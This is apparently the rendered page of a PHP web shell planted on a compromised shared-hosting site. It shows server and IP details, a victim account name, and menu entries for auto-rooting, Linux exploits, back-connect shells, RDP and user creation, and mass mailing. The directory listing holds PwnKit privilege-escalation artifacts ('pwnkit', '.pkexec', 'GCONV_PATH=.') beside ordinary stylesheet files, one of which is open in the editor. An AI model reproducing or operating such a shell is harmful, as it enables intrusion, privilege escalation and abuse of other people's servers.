Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_blog.scss
2.38
KB
-rw-r--r--
_blog_page.scss
29.56
KB
-rw-r--r--
_bradcam.scss
5.33
KB
-rw-r--r--
_color.scss
1.38
KB
-rw-r--r--
_common.scss
16.94
KB
-rw-r--r--
_contact-with-area.scss
464
B
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_countDown.scss
1.77
KB
-rw-r--r--
_david-droga.scss
4.11
KB
-rw-r--r--
_details_page.scss
278
B
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.53
KB
-rw-r--r--
_footer.scss
4.46
KB
-rw-r--r--
_h1-hero.scss
6.8
KB
-rw-r--r--
_headerMenu.scss
5.98
KB
-rw-r--r--
_mixins.scss
359
B
-rw-r--r--
_overlay.scss
1.03
KB
-rw-r--r--
_project-area.scss
4.12
KB
-rw-r--r--
_services.scss
585
B
-rw-r--r--
_services_section.scss
1.74
KB
-rw-r--r--
_support-company.scss
2.91
KB
-rw-r--r--
_team.scss
1.09
KB
-rw-r--r--
_testimonial.scss
2.75
KB
-rw-r--r--
_variables.scss
2.38
KB
-rw-r--r--
_wantToWork.scss
1.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.scss
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _color.scss
/*------------- Color variable --------------*/ // Font-color and Heading $heading-color:#0e132a; $heading_color2: #242b5e; //Theme color $theme-color: #ff5f13; $theme-color2: #1f2b7b; $theme-color3: #f27420; $theme-color4: #ff3500; $body-text-color: #555; $hr-border-color:#eceff8; // btn and Section color $btn_bg: #ff5f13; // Section Bg $section_bg1: #454545; .white-bg{ background: #ffffff; } .gray-bg{ background: #f5f5f5; } $gray-color: #bebebe; $gray-color-2: #bdbdbd; $gray-color3:#5c5c5c; $white_color:#fff; // font color $font_color1: #506172; $border_color: #fdcb9e; $footer_bg: #303030; $sidebar_bg: #fbf9ff; // bg $brand-bg: #f1f4fa; $testimonial-bg:#f9fafc; // Soft color $black-soft:#7e7e7e; // Section Bg color $blue-bg1:#00163e; /*-------------Color include--------------*/ //Colors $white: #ffffff; $black: #16161a; $gray:#f7f7fd; /*-- Background color---*/ .gray-bg { background: $gray; } .white-bg { background:$white; } .black-bg { background: $black; } .theme-bg { background:$theme-color; } .brand-bg{ background: $brand-bg; } .testimonial-bg{ background: $testimonial-bg; } /*--- color------*/ .white-color { color: $white; } .black-color { color: $black; } .theme-color { color: $theme-color; }
Close